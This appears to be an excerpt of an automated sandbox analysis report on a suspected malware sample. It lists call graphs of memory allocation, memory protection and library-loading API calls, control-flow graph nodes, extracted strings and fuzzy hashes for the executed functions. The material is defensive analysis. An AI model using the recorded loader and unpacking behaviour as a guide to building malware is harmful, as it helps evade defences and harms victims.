VirtualAlloc 111968->111956 111968->111957 111968->111958 111972 29280f9 23 API calls 111968->111972 111972->111956 111986 292680b 111985->111986 112000 2926a40 111985->112000 111986->111985 111987 29269b6 25 API calls 111986->111987 111986->112000 111987->111986 111988 29282a3 111989 2927e50 VirtualAlloc 112000->111988 112000->111989 112002 29280f9 23 API calls 112000->112002 112006 2927ef1 112000->112006 112002->112006 112006->111988 112029 292587b 112017->112029 112018 29282a3 112019 2927e50 VirtualAlloc 112029->112018 112029->112019 112033 29280f9 23 API calls 112029->112033 112034 2927ef1 112029->112034 112033->112034 112034->112018 112048 2962dfe 112047->112048 112049 2963305 VirtualProtect 112048->112049 112052 294260d 2 API calls 112051->112052 112053 294246c 112051->112053 112052->112053 112054 294268f 112053->112054 112056 29424dc 4 API calls 112053->112056 112059 2942631 112053->112059 112060 294260d 2 API calls 112053->112060 112056->112053 112060->112053 112065 2941a13 112064->112065 112066 2942316 7 API calls 112065->112066 112072 29426d4 112065->112072 112094 292587b 112082->112094 112083 29282a3 112084 2927e50 VirtualAlloc 112094->112083 112094->112084 112097 29280f9 23 API calls 112094->112097 112101 2927ef1 112094->112101 112097->112101 112101->112083 112114 29429ce 112112->112114 112113 29431d4 VirtualProtect 112114->112113 112117 29421ec 112116->112117 112118 2942224 112117->112118 112124 2942001 112117->112124 112139 29617d6 112138->112139 112140 2962785 112139->112140 112142 29627e6 VirtualProtect 112139->112142 112142->112140 112157 29269cd 112144->112157 112145 2927ef1 112146 29282a3 112145->112146 112147 2927e50 VirtualAlloc 112157->112145 112157->112146 112157->112147 112160 29280f9 23 API calls 112157->112160 112160->112145 112175 2962971 112174->112175 112176 2963305 VirtualProtect 112175->112176 112179 2923dd7 37 API calls 112178->112179 112180 2923dcc 112178->112180 112179->112180 112181 2924c4a LoadLibraryW 112180->112181 112217 29291c8 112216->112217 112218 29291dc 11 API calls 112217->112218 112244 2928fd7 112241->112244 112251 292916e 112241->112251 112242 2929292 112243 2929251 112244->112251 112252 29291dc 10 API calls 112244->112252 112251->112242 112251->112243 112252->112251 112267 2922dd6 112266->112267 112268 2923299 VirtualProtect 112267->112268 112271 2923063 112270->112271 112272 2923299 VirtualProtect 112271->112272 112277 2924484 LoadLibraryW 112274->112277 112276 2924c67 LoadLibraryW 112278 2924c84 112276->112278 112277->112276 112277->112278 112324 2926fe4 112311->112324 112312 29282a3 112313 2927e50 VirtualAlloc 112324->112312 112324->112313 112326 29280f9 23 API calls 112324->112326 112330 2927ef1 112324->112330 112326->112330 112330->112312 112342 2942de2 VirtualProtect 112341->112342 112344 2943233 112342->112344 112344->107358 112346 29620ea 112345->112346 112348 29627e6 VirtualProtect 112346->112348 112350 2962785 112346->112350 112348->112350 112352 2923dff 112351->112352 112354 2923df0 112351->112354 112353 2923e2c 33 API calls 112352->112353 112353->112354 112355 2924c4a LoadLibraryW 112354->112355 112360 2925089 112354->112360 112391 2924dd3 112390->112391 112392 2925089 112391->112392 112407 2925956 112391->112407 112425 29617d6 112424->112425 112426 2962785 112425->112426 112428 29627e6 VirtualProtect 112425->112428 112428->112426 112433 2924484 LoadLibraryW 112430->112433 112432 2924c67 LoadLibraryW 112434 2924c84 112432->112434 112433->112432 112433->112434 112480 29261ae 112467->112480 112468 29282a3 112469 2927e50 VirtualAlloc 112480->112468 112480->112469 112482 29280f9 23 API calls 112480->112482 112486 2927ef1 112480->112486 112482->112486 112486->112468 112498 294222e 112497->112498 112499 2942316 7 API calls 112498->112499 112506 29426d4 112498->112506 112516 29431c8 VirtualProtect 112515->112516 112518 2943233 112516->112518 112518->107358 112520 2940dbf 112519->112520 112527 294167a 112519->112527 115722 2940e80 14 API calls 112520->115722 112528 2942316 7 API calls 112527->112528 112534 29426d4 112527->112534 112557 29261a7 112544->112557 112575 29239ce 112574->112575 112616 2924dd3 112615->112616 112650 29269cd 112649->112650 112651 29282a3 112650->112651 112652 2927e50 VirtualAlloc 112650->112652 112664 29280f9 23 API calls 112650->112664 112668 2927ef1 112650->112668 112664->112668 112668->112651 112680 2924c3e LoadLibraryW 112679->112680 112682 2924c67 LoadLibraryW 112680->112682 112683 2924c84 112680->112683 112682->112683 112718 29617d6 112716->112718 112717 2962785 112718->112717 112720 29627e6 VirtualProtect 112718->112720 112720->112717 112723 29291b5 112722->112723 112724 29291dc 11 API calls 112723->112724 112759 292600a 112747->112759 112748 29282a3 112749 2927e50 VirtualAlloc 112759->112748 112759->112749 112762 29280f9 23 API calls 112759->112762 112766 2927ef1 112759->112766 112762->112766 112766->112748 112778 2941df3 112777->112778 112779 2942316 7 API calls 112778->112779 112787 29426d4 112778->112787 112799 2962567 112795->112799 112796 2962612 5 API calls 112796->112799 112797 2962579 5 API calls 112797->112799 112799->112795 112799->112796 112799->112797 112800 296262a 112799->112800 112801 2962589 5 API calls 112799->112801 112801->112799 112820 292638d 112807->112820 112808 29282a3 112809 2927e50 VirtualAlloc 112820->112808 112820->112809 112822 29280f9 23 API calls 112820->112822 112825 2927ef1 112820->112825 112822->112825 112825->112808 112838 2960d93 112837->112838 112839 2960dd2 112838->112839 112842 29616ca 112838->112842 112859 292600a 112847->112859 112848 29282a3 112849 2927e50 VirtualAlloc 112859->112848 112859->112849 112862 29280f9 23 API calls 112859->112862 112866 2927ef1 112859->112866 112862->112866 112866->112848 112878 2961da9 112877->112878 112880 29627e6 VirtualProtect 112878->112880 112882 2962785 112878->112882 112880->112882 112884 296b1c1 VirtualAlloc 112883->112884 112886 296b230 112884->112886 112886->107358 112897 2927e15 112887->112897 112888 2927e50 VirtualAlloc 112897->112888 112901 29280f9 23 API calls 112897->112901 112906 2927ef1 112897->112906 112901->112906 112918 292458a LoadLibraryW 112917->112918 112920 2924c67 LoadLibraryW 112918->112920 112921 2924c84 112918->112921 112920->112921 112955 2941786 112954->112955 112956 2942316 7 API calls 112955->112956 112962 29426d4 112955->112962 112975 2924484 LoadLibraryW 112972->112975 112974 2924c67 LoadLibraryW 112976 2924c84 112974->112976 112975->112974 112975->112976 113010 292919f 113009->113010 113011 2929251 113010->113011 113018 2929292 113010->113018 113033 29271a6 113032->113033 113034 29282a3 113033->113034 113035 2927e50 VirtualAlloc 113033->113035 113047 29280f9 23 API calls 113033->113047 113051 2927ef1 113033->113051 113047->113051 113051->113034 113063 2924c3e LoadLibraryW 113062->113063 113065 2924c67 LoadLibraryW 113063->113065 113066 2924c84 113063->113066 113065->113066 113100 292899a VirtualAlloc 113099->113100 113101 2928a08 113100->113101 113121 2960d99 113120->113121 113122 2960dd2 113121->113122 113123 29616ca 113121->113123 113131 2962dfe 113130->113131 113132 2963305 VirtualProtect 113131->113132 113135 2922c71 113134->113135 113136 2923299 VirtualProtect 113135->113136 113139 29431d4 VirtualProtect 113138->113139 113140 2943233 113139->113140 113140->107358 113142 2960d93 113141->113142 113143 2960dd2 113142->113143 113146 29616ca 113142->113146 113152 2924890 113151->113152 113153 29248a0 LoadLibraryW 113151->113153 113152->113153 113156 292466b 113152->113156 113155 2924c67 LoadLibraryW 113153->113155 113158 2924c84 113153->113158 113155->113158 113193 2929c70 113192->113193 113194 2929c8c VirtualFree 113193->113194 113195 2929c95 2 API calls 113193->113195 113195->113194 113199 29287c8 VirtualAlloc 113198->113199 113202 2928a08 113199->113202 113221 2929494 8 API calls 113220->113221 113223 292943a 113221->113223 113242 2923087 113241->113242 113242->113241 113243 2923299 VirtualProtect 113242->113243 113246 296e47c 113245->113246 113252 296e494 113246->113252 113253 296e6e5 4 API calls 113246->113253 113253->113252 113258 294246c 113255->113258 113256 29424dc 4 API calls 113256->113258 113257 2942631 113258->113256 113258->113257 113259 294260d 2 API calls 113258->113259 113265 294268f 113258->113265 113259->113258 113268 2960851 113267->113268 113269 2960dd2 113268->113269 113272 29616ca 113268->113272 113278 2928039 113277->113278 113279 29280f9 23 API calls 113278->113279 113308 2960c50 113307->113308 113309 2960dd2 113308->113309 113312 29616ca 113308->113312 113323 294246c 113317->113323 113318 29424dc 3 API calls 113318->113323 113319 2942631 113320 294260d 2 API calls 113320->113323 113323->113318 113323->113319 113323->113320 113327 294268f 113323->113327 113330 292345d 113329->113330 113331 2923dc4 41 API calls 113330->113331 113336 2923dcc 113330->113336 113371 2940c53 113370->113371 113372 2940dbf 113371->113372 113379 294167a 113371->113379 113397 2962046 113396->113397 113399 29627e6 VirtualProtect 113397->113399 113401 2962785 113397->113401 113399->113401 113403 2923e67 113402->113403 113404 2924c4a LoadLibraryW 113403->113404 113409 2925089 113403->113409 113440 2923843 113439->113440 113441 2923dc4 41 API calls 113440->113441 113446 2923dcc 113440->113446 113481 2922ef6 113480->113481 113482 2923299 VirtualProtect 113481->113482 113487 2924484 LoadLibraryW 113484->113487 113486 2924c67 LoadLibraryW 113488 2924c84 113486->113488 113487->113486 113487->113488 113522 2941410 113521->113522 113523 29414c7 12 API calls 113522->113523 113544 2960863 113543->113544 113545 2960dd2 113544->113545 113548 29616ca 113544->113548 113554 29618cc 113553->113554 113556 29627e6 VirtualProtect 113554->113556 113558 2962785 113554->113558 113556->113558 113560 29632e1 113559->113560 113561 2963305 VirtualProtect 113560->113561 113564 2942c63 113563->113564 113565 29431d4 VirtualProtect 113564->113565 113569 294285f 113567->113569 113585 292587b 113573->113585 113615 2925c87 113603->113615 113634 29408c4 113633->113634 113671 2925c2a 113659->113671 113660 29282a3 113661 2927e50 VirtualAlloc 113671->113660 113671->113661 113674 29280f9 23 API calls 113671->113674 113678 2927ef1 113671->113678 113674->113678 113678->113660 113690 296df48 113689->113690 113691 296e471 5 API calls 113690->113691 113692 296e79a 113690->113692 113700 296df5b 113690->113700 113700->107358 113702 2962c68 113701->113702 113703 2963305 VirtualProtect 113702->113703 113706 29298a5 113705->113706 113707 29298ac 4 API calls 113705->113707 113708 2929a0f 3 API calls 113706->113708 113707->113706 113715 2940854 113714->113715 113716 2940dbf 113715->113716 113723 294167a 113715->113723 113741 29632e1 113740->113741 113742 2963305 VirtualProtect 113741->113742 113745 2960851 113744->113745 113746 2960dd2 113745->113746 113749 29616ca 113745->113749 113755 2962046 113754->113755 113756 2962785 113755->113756 113758 29627e6 VirtualProtect 113755->113758 113758->113756 113761 2923838 113760->113761 113762 2923dc4 41 API calls 113761->113762 113767 2923dcc 113761->113767 113808 2942451 113801->113808 113809 2942460 113801->113809 113803 29424dc 4 API calls 113803->113809 113805 29426d4 113806 294297e VirtualProtect 113806->113805 113807 2942631 113808->113805 113808->113806 113809->113803 113809->113807 113809->113808 113810 294260d 2 API calls 113809->113810 113810->113809 113814 296d40a 113813->113814 113815 296e471 5 API calls 113814->113815 113816 296e79a 113814->113816 113824 296df5b 113814->113824 113824->107358 113826 2924e0b 113825->113826 113827 2925089 113826->113827 113842 2925956 113826->113842 113860 292325f 113859->113860 113861 2923299 VirtualProtect 113860->113861 113864 2961807 113863->113864 113866 29627e6 VirtualProtect 113864->113866 113868 2962785 113864->113868 113866->113868 113870 2926c25 113869->113870 113870->113869 113871 2926e0a 113870->113871 113875 2926ed8 113870->113875 113904 29287c8 VirtualAlloc 113903->113904 113906 2928a08 113904->113906 113926 296dc17 7 API calls 113925->113926 113928 296dc0f 113926->113928 113941 29632e1 113940->113941 113942 2963305 VirtualProtect 113941->113942 113945 2962c1f 113944->113945 113946 2963305 VirtualProtect 113945->113946 113949 29248aa LoadLibraryW 113948->113949 113951 2924c67 LoadLibraryW 113949->113951 113952 2924c84 113949->113952 113951->113952 113997 2925c2a 113985->113997 113986 29282a3 113987 2927e50 VirtualAlloc 113997->113986 113997->113987 114000 29280f9 23 API calls 113997->114000 114004 2927ef1 113997->114004 114000->114004 114004->113986 114016 2924c3e LoadLibraryW 114015->114016 114018 2924c67 LoadLibraryW 114016->114018 114019 2924c84 114016->114019 114018->114019 114053 29248f2 LoadLibraryW 114052->114053 114055 2924c67 LoadLibraryW 114053->114055 114056 2924c84 114053->114056 114055->114056 114091 296dc4b 114089->114091 114092 296dc3a 114089->114092 114090 296de68 6 API calls 114090->114092 114091->114090 114091->114092 114093 296e471 5 API calls 114092->114093 114094 296e79a 114092->114094 114096 296df5b 114092->114096 114096->107358 114104 2962cf3 114103->114104 114105 2963305 VirtualProtect 114104->114105 114108 29288e9 VirtualAlloc 114107->114108 114110 2928a08 114108->114110 114130 2928103 114129->114130 114131 29281d5 114130->114131 114134 29282a3 114130->114134 114158 2940cf7 114157->114158 114159 2940dbf 114158->114159 114166 294167a 114158->114166 114184 2929d1a VirtualFree 114183->114184 114186 2929d88 114184->114186 114186->107358 114188 2928103 114187->114188 114189 29281d5 114188->114189 114192 29282a3 114188->114192 114216 2961438 114215->114216 114217 296150f 2 API calls 114216->114217 114224 292952c 114223->114224 114228 29295fb 114224->114228 115804 2929604 6 API calls 114224->115804 114238 2941d1c 114237->114238 114239 2942316 7 API calls 114238->114239 114245 29426d4 114238->114245 114256 2940cf7 114255->114256 114257 2940dbf 114256->114257 114264 294167a 114256->114264 114282 29624c9 114281->114282 114282->114281 114283 29627e6 VirtualProtect 114282->114283 114286 2962785 114282->114286 114283->114286 114288 2960b79 114287->114288 114289 2960dd2 114288->114289 114292 29616ca 114288->114292 114298 29417df 114297->114298 114299 2942316 7 API calls 114298->114299 114305 29426d4 114298->114305 114316 296095c 114315->114316 114317 2960dd2 114316->114317 114321 29616ca 114316->114321 114326 294150e 114325->114326 114328 2941502 114325->114328 115808 2941523 11 API calls 114326->115808 114330 29415b2 114328->114330 115809 29415bb 10 API calls 114328->115809 114359 2925cd2 114347->114359 114348 29282a3 114349 2927e50 VirtualAlloc 114359->114348 114359->114349 114362 29280f9 23 API calls 114359->114362 114366 2927ef1 114359->114366 114362->114366 114366->114348 114378 2962ce9 114377->114378 114379 2963305 VirtualProtect 114378->114379 114382 29297b0 114381->114382 114383 29298a5 114382->114383 114384 2929820 4 API calls 114382->114384 114395 296ebd3 114393->114395 114394 296f345 VirtualAlloc 114395->114394 114398 29408eb 114397->114398 114399 2940dbf 114398->114399 114406 294167a 114398->114406 114424 2928039 114423->114424 114425 29280f9 23 API calls 114424->114425 114454 29248db LoadLibraryW 114453->114454 114456 2924c67 LoadLibraryW 114454->114456 114457 2924c84 114454->114457 114456->114457 114491 292943a 114490->114491 114492 29294df 114491->114492 114493 2929466 114491->114493 114522 29263e9 114510->114522 114511 29282a3 114512 2927e50 VirtualAlloc 114522->114511 114522->114512 114525 29280f9 23 API calls 114522->114525 114529 2927ef1 114522->114529 114525->114529 114529->114511 114552 29270d4 114540->114552 114541 29282a3 114542 2927e50 VirtualAlloc 114552->114541 114552->114542 114555 29280f9 23 API calls 114552->114555 114559 2927ef1 114552->114559 114555->114559 114559->114541 114571 29618db 114570->114571 114573 29627e6 VirtualProtect 114571->114573 114575 2962785 114571->114575 114573->114575 114577 29608c5 114576->114577 114578 2960dd2 114577->114578 114582 29616ca 114577->114582 114589 2941410 114586->114589 114587 29414c7 12 API calls 114589->114587 114609 29620bc 114608->114609 114615 29240d4 LoadLibraryW 114614->114615 114652 296088b 114651->114652 114662 2926c01 114661->114662 114696 294088a 114695->114696 114697 2940dbf 114696->114697 114704 294167a 114696->114704 114722 2940bac 114721->114722 114723 2940dbf 114722->114723 114730 294167a 114722->114730 114748 2960bb0 114747->114748 114749 2960dd2 114748->114749 114752 29616ca 114748->114752 114758 294189f 114757->114758 114759 2942316 7 API calls 114758->114759 114765 29426d4 114758->114765 114776 2929c9f 114775->114776 114777 2929cbb VirtualFree 114776->114777 114778 2929cf5 VirtualFree 114776->114778 114778->114777 114782 2929c9f 114781->114782 114783 2929cf5 VirtualFree 114782->114783 114784 2929cbb VirtualFree 114782->114784 114783->114784 114788 295309a VirtualProtect 114787->114788 114789 29530c5 VirtualProtect 114788->114789 114793 292943a 114792->114793 114794 29294d8 114793->114794 114796 2929466 114793->114796 114813 2941f8a 114812->114813 114814 2942316 7 API calls 114813->114814 114820 29426d4 114813->114820 114833 294246c 114830->114833 114831 29424dc 4 API calls 114831->114833 114832 2942631 114833->114831 114833->114832 114834 294260d 2 API calls 114833->114834 114840 294268f 114833->114840 114834->114833 114854 292676e 114842->114854 114843 29282a3 114844 2927e50 VirtualAlloc 114854->114843 114854->114844 114857 29280f9 23 API calls 114854->114857 114861 2927ef1 114854->114861 114857->114861 114861->114843 114873 2941410 114872->114873 114874 29414c7 12 API calls 114873->114874 114895 2941410 114894->114895 114896 29414c7 12 API calls 114895->114896 114917 2940b69 114916->114917 114918 2940dbf 114917->114918 114925 294167a 114917->114925 114943 29431c8 VirtualProtect 114942->114943 114945 2943233 114943->114945 114945->107358 114947 2923a45 114946->114947 114948 2923dc4 41 API calls 114947->114948 114953 2923dcc 114947->114953 114988 29431c8 VirtualProtect 114987->114988 114990 2943233 114988->114990 114990->107358 115003 29265cc 114991->115003 114992 29282a3 114993 2927e50 VirtualAlloc 115003->114992 115003->114993 115006 29280f9 23 API calls 115003->115006 115010 2927ef1 115003->115010 115006->115010 115010->114992 115022 2926dfd 115021->115022 115023 2926e0a 115022->115023 115037 2926ed8 115022->115037 115056 294176b 115055->115056 115057 2942316 7 API calls 115056->115057 115063 29426d4 115056->115063 115075 292876a VirtualAlloc 115073->115075 115076 2928a08 115075->115076 115096 2962751 115095->115096 115097 29627e6 VirtualProtect 115096->115097 115100 2962785 115096->115100 115097->115100 115102 296ca6c 115101->115102 115104 296df60 115102->115104 115105 296ca96 115102->115105 115124 2961755 115123->115124 115125 2962785 115124->115125 115127 29627e6 VirtualProtect 115124->115127 115127->115125 115130 296ca6c 115129->115130 115132 296ca96 115130->115132 115137 296df60 115130->115137 115152 2924e67 115151->115152 115153 2925089 115152->115153 115168 2925956 115152->115168 115186 2926dfd 115185->115186 115187 2926e0a 115186->115187 115201 2926ed8 115186->115201 115220 29288e9 VirtualAlloc 115219->115220 115222 2928a08 115220->115222 115242 296276f 115241->115242 115243 2962785 115242->115243 115244 29627e6 VirtualProtect 115242->115244 115244->115243 115248 2961da9 115247->115248 115250 29627e6 VirtualProtect 115248->115250 115252 2962785 115248->115252 115250->115252 115254 2941f11 115253->115254 115255 2942316 7 API calls 115254->115255 115261 29426d4 115254->115261 115284 292758c 115271->115284 115272 29282a3 115273 2927e50 VirtualAlloc 115284->115272 115284->115273 115286 29280f9 23 API calls 115284->115286 115290 2927ef1 115284->115290 115286->115290 115290->115272 115302 292758c 115301->115302 115303 29282a3 115302->115303 115304 2927e50 VirtualAlloc 115302->115304 115316 29280f9 23 API calls 115302->115316 115320 2927ef1 115302->115320 115316->115320 115320->115303 115338 2928f60 115331->115338 115341 2928f6f 115331->115341 115332 2929251 115338->115332 115339 2929292 115338->115339 115341->115338 115342 29291dc 11 API calls 115341->115342 115342->115338 115357 296bf21 115356->115357 115359 296df60 115357->115359 115360 296ca96 115357->115360 115379 2940b38 115378->115379 115380 2940dbf 115379->115380 115387 294167a 115379->115387 115405 2941f0a 115404->115405 115406 2942316 7 API calls 115405->115406 115412 29426d4 115405->115412 115435 292630c 115422->115435 115423 29282a3 115424 2927e50 VirtualAlloc 115435->115423 115435->115424 115437 29280f9 23 API calls 115435->115437 115441 2927ef1 115435->115441 115437->115441 115441->115423 115453 2940b0a 115452->115453 115454 2940dbf 115453->115454 115461 294167a 115453->115461 115479 2961da9 115478->115479 115481 29627e6 VirtualProtect 115479->115481 115483 2962785 115479->115483 115481->115483 115485 2928b3e 115484->115485 115493 2928b4d 115484->115493 115486 2928dd7 115485->115486 115492 29296a4 115485->115492 115487 2928bc6 15 API calls 115487->115493 115493->115485 115493->115487 115495 2928d57 15 API calls 115493->115495 115497 2928d02 13 API calls 115493->115497 115495->115493 115497->115493 115552->109024 115869 405855 115870 40571b VirtualProtect 115869->115870 115872 4059ad 115870->115872 115873 31fc670 ReadFile 115874 41564e 115875 415675 115874->115875 115878 415683 115875->115878 115880 4156c3 115878->115880 115882 4156b2 NtQueryDefaultLocale 115878->115882 115880->115882 115884 41593f 115880->115884 115883 4159d7 115882->115883 115885 415976 NtQueryDefaultLocale 115884->115885 115887 4159d7 115885->115887

                                Executed Functions

                                Function 0292344A Relevance: 93.4, APIs: 2, Strings: 51, Instructions: 652COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 224 292344a-2923c61 call 29236cc call 29238f1 236 2923c67-292411d call 2923dc4 call 2923dd7 call 29240d4 224->236 237 292455f-2924c44 224->237 255 2924c4a-2924c65 LoadLibraryW 236->255 237->255 256 2924cc2-2925083 call 2924d0e call 292505f call 2925078 255->256 257 2924c67-2924c82 LoadLibraryW 255->257 281 2925956-2926016 call 2925cb5 256->281 282 2925089-292552a call 2925139 call 2925150 call 29254d6 call 292552b 256->282 257->256 259 2924c84-2924c9f 257->259 259->256 265 2924ca1-2924cbc 259->265 265->256 271 292601e-2926268 call 292611a call 2926264 265->271 286 292626a-292626d 271->286 287 292626e-2926605 call 292629b call 29265fa 271->287 281->271 286->287 325 292660b-2926ac1 call 2926780 call 2926a66 287->325 326 2926ed8-2927592 287->326 348 2927598-29279d0 call 29276b6 325->348 326->348 356 29282a3-292863d call 29282c4 call 292863f 348->356 357 29279d6-2927e4e 348->357 375 2928963-2928a06 VirtualAlloc 356->375 365 2927e50-2927e8c 357->365 366 2927e91-2927eef 357->366 365->375 367 2927f02-2927f17 366->367 368 2927ef1-2927efd 366->368 372 2927f2a-2927f49 367->372 373 2927f19-2927f25 367->373 371 29281c8-29281cf 368->371 371->356 380 29281d5-29281f2 call 29281f4 371->380 376 2927f4b-2927f57 372->376 377 2927f5c-2927f6e 372->377 373->371 388 2928a08-2928a46 375->388 389 2928a4e-2928ae0 call 2928a7c 375->389 376->371 381 2927f70-2927f7c 377->381 382 2927f81-2927fea 377->382 381->371 392 2927ff0-2928037 382->392 393 29281bc-29281c2 382->393 388->389 401 2928ae2-2928aec 389->401 402 2928af1-2928b16 call 2928b17 389->402 396 2928042-2928050 392->396 397 2928039-292803f 392->397 393->371 399 2928056-2928063 396->399 400 29280de-2928129 call 29280f9 396->400 397->396 399->400 403 2928065-29280b0 399->403 421 2928137-2928188 400->421 422 292812b-2928135 400->422 404 2928d98-2928dd1 401->404 402->404 412 29280b2-29280ce 403->412 413 29280d0 403->413 408 2928dd7-2928e97 call 2928e98 404->408 409 29296a4-2929737 404->409 424 2929748-2929793 409->424 425 2929739-2929743 409->425 412->413 417 29280d7 412->417 413->397 417->400 427 2928196 421->427 428 292818a-2928194 421->428 426 29281a0-29281a7 422->426 430 29297a4-29298aa call 2929820 call 29298ac 424->430 431 2929795-292979f 424->431 429 29299ef-2929a7f call 2929a0f 425->429 434 29281b7 426->434 435 29281a9-29281b5 426->435 427->426 428->426 441 2929a92-2929aa7 429->441 442 2929a81-2929a8d 429->442 430->429 431->429 434->371 435->371 445 2929aba-2929ad9 441->445 446 2929aa9-2929ab5 441->446 444 2929d58-2929d86 VirtualFree 442->444 454 2929dd0-2929e0e 444->454 455 2929d88-2929daa 444->455 449 2929adb-2929ae7 445->449 450 2929aec-2929afe 445->450 446->444 449->444 451 2929b00-2929b0c 450->451 452 2929b11-2929b7a 450->452 451->444 458 2929b80-2929be0 452->458 459 2929d4c-2929d52 452->459 457 2929e16-2929e20 454->457 455->454 462 2929dac-2929dce 455->462 463 2929be6-2929bf3 458->463 464 2929c6e-2929c94 call 2929c95 458->464 459->444 462->454 462->457 463->464 465 2929bf5-2929c2a call 2929c1d 463->465 464->459 465->464
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: 5CCI$=K:3$E$HYW$L$L$L$L$L$L$P$W$W$W$[P$a$a$a$a$a$a$b$b$b$c$d$d$d$e$i$i$i$i$o$o$o$o$r$r$r$r$r$r$r$s$s$t$x$y$y$y
                                • API String ID: 0-960091691
                                • Opcode ID: b64be6ccaf423245a3e003afef22b77d992e5c96695135af63615d315855449e
                                • Instruction ID: 30aa24d1d5f4ff378057e35fdd825edfda4cf6aafe2c08ec629bfcb43e02575c
                                • Opcode Fuzzy Hash: b64be6ccaf423245a3e003afef22b77d992e5c96695135af63615d315855449e
                                • Instruction Fuzzy Hash: B942F451D186A88AF7258B24DC44BAA7B75EF91300F0490FDC08DAB281D67E5FC5CF66
                                Function 02925854 Relevance: 92.2, APIs: 1, Strings: 60, Instructions: 734COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 1222 2925854-2925882 1224 2925956-2926010 call 2925cb5 1222->1224 1225 2925888-2925913 1222->1225 1231 2926016-2926268 call 292611a call 2926264 1224->1231 1225->1224 1229 2925915-2925951 1225->1229 1229->1231 1248 292626a-292626d 1231->1248 1249 292626e-2926605 call 292629b call 29265fa 1231->1249 1248->1249 1262 292660b-2926ac1 call 2926780 call 2926a66 1249->1262 1263 2926ed8-2927592 1249->1263 1285 2927598-29279d0 call 29276b6 1262->1285 1263->1285 1293 29282a3-292863d call 29282c4 call 292863f 1285->1293 1294 29279d6-2927e4e 1285->1294 1312 2928963-2928a06 VirtualAlloc 1293->1312 1302 2927e50-2927e8c 1294->1302 1303 2927e91-2927eef 1294->1303 1302->1312 1304 2927f02-2927f17 1303->1304 1305 2927ef1-2927efd 1303->1305 1309 2927f2a-2927f49 1304->1309 1310 2927f19-2927f25 1304->1310 1308 29281c8-29281cf 1305->1308 1308->1293 1317 29281d5-29281f2 call 29281f4 1308->1317 1313 2927f4b-2927f57 1309->1313 1314 2927f5c-2927f6e 1309->1314 1310->1308 1325 2928a08-2928a46 1312->1325 1326 2928a4e-2928ae0 call 2928a7c 1312->1326 1313->1308 1318 2927f70-2927f7c 1314->1318 1319 2927f81-2927fea 1314->1319 1318->1308 1329 2927ff0-2928037 1319->1329 1330 29281bc-29281c2 1319->1330 1325->1326 1338 2928ae2-2928aec 1326->1338 1339 2928af1-2928b16 call 2928b17 1326->1339 1333 2928042-2928050 1329->1333 1334 2928039-292803f 1329->1334 1330->1308 1336 2928056-2928063 1333->1336 1337 29280de-2928129 call 29280f9 1333->1337 1334->1333 1336->1337 1340 2928065-29280b0 1336->1340 1358 2928137-2928188 1337->1358 1359 292812b-2928135 1337->1359 1341 2928d98-2928dd1 1338->1341 1339->1341 1349 29280b2-29280ce 1340->1349 1350 29280d0 1340->1350 1345 2928dd7-2928e97 call 2928e98 1341->1345 1346 29296a4-2929737 1341->1346 1361 2929748-2929793 1346->1361 1362 2929739-2929743 1346->1362 1349->1350 1354 29280d7 1349->1354 1350->1334 1354->1337 1364 2928196 1358->1364 1365 292818a-2928194 1358->1365 1363 29281a0-29281a7 1359->1363 1367 29297a4-29298aa call 2929820 call 29298ac 1361->1367 1368 2929795-292979f 1361->1368 1366 29299ef-2929a7f call 2929a0f 1362->1366 1371 29281b7 1363->1371 1372 29281a9-29281b5 1363->1372 1364->1363 1365->1363 1378 2929a92-2929aa7 1366->1378 1379 2929a81-2929a8d 1366->1379 1367->1366 1368->1366 1371->1308 1372->1308 1382 2929aba-2929ad9 1378->1382 1383 2929aa9-2929ab5 1378->1383 1381 2929d58-2929d86 VirtualFree 1379->1381 1391 2929dd0-2929e0e 1381->1391 1392 2929d88-2929daa 1381->1392 1386 2929adb-2929ae7 1382->1386 1387 2929aec-2929afe 1382->1387 1383->1381 1386->1381 1388 2929b00-2929b0c 1387->1388 1389 2929b11-2929b7a 1387->1389 1388->1381 1395 2929b80-2929be0 1389->1395 1396 2929d4c-2929d52 1389->1396 1394 2929e16-2929e20 1391->1394 1392->1391 1399 2929dac-2929dce 1392->1399 1400 2929be6-2929bf3 1395->1400 1401 2929c6e-2929c94 call 2929c95 1395->1401 1396->1381 1399->1391 1399->1394 1400->1401 1402 2929bf5-2929c2a call 2929c1d 1400->1402 1401->1396 1402->1401
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2726809063.0000000002920000.00000020.00001000.00020000.00000000.sdmp, Offset: 02920000, based on PE: false
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_2920000_m0Yc9KltGw.jbxd
                                Similarity
                                • API ID:
                                • String ID: A$E$F$L$L$L$L$P$S$V$V$W$W$[W$a$a$a$a$a$a$b$b$c$c$d$d$e$e$e$i$i$i$i$i$l$l$l$l$o$o$o$o$r$r$r$r$r$r$r$r$s$s$t$t$t$u$u$x$y$y
                                • API String ID: 0-2002451845
                                • Opcode ID: efd57313e90d302c46f2a1d1f05d2838b6d4215c80f8e6a728908e52be8c74ec
                                • Instruction ID: 9f1590d0bfc547174e305633f57310ed5f998bcc451510479ddd10548f7ed579
                                • Opcode Fuzzy Hash: efd57313e90d302c46f2a1d1f05d2838b6d4215c80f8e6a728908e52be8c74ec
                                • Instruction Fuzzy Hash: C952E7A1D182A49AF7218A24DC44BEBBB79EF91304F0480F9D54CA7685D67E0FC5CF62
                                Function 02925623 Relevance: 92.2, APIs: 1, Strings: 60, Instructions: 732COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
